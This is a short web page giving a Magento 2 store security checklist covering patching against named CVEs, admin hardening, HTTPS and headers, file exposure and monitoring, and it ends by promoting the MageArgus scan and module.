This Magento 2 security checklist covers the controls that actually stop real attacks: staying patched against known CVEs, hardening the admin, setting security headers, locking down file permissions, and monitoring for change. Run the free scan to see which items your store already passes and which need attention.
The checklist
1. Patching & versions
- Run a supported Magento / Adobe Commerce version.
- Apply every security patch — SessionReaper (CVE-2025-54236), CosmicSting (CVE-2024-34102), TrojanOrders (CVE-2022-24086) and newer.
- Confirm patches are applied on disk, not just by version string.
2. Admin hardening
- Custom admin URL path; never
/admin. - Two-factor authentication enforced for all admins.
- Remove unknown admin users and stale integration tokens.
- Strong password policy and session limits.
3. Transport & headers
- HTTPS everywhere with HSTS.
- Content-Security-Policy, X-Content-Type-Options, X-Frame-Options, Referrer-Policy.
- Valid, non-expiring TLS certificate.
4. Files & secrets
- No publicly accessible
.git, backups,env.phpor database dumps. - Correct file permissions; no world-writable code.
- No PHP execution under
pub/media.
5. Monitoring
- Scan regularly — exposure changes every time a new CVE drops.
- Watch for new admin users, config changes and injected content.
- Keep tested, offline backups.
Check your store against it automatically
You don’t have to audit all of this by hand. The free MageArgus scan covers the externally-visible items — version & CVE exposure, TLS and headers, leaked files and skimmer indicators — and returns a 0–100 score so you can see your gaps at a glance. The on-store MageArgus module covers the internal items: on-disk patch confirmation, file/database malware, permissions and rogue-admin detection.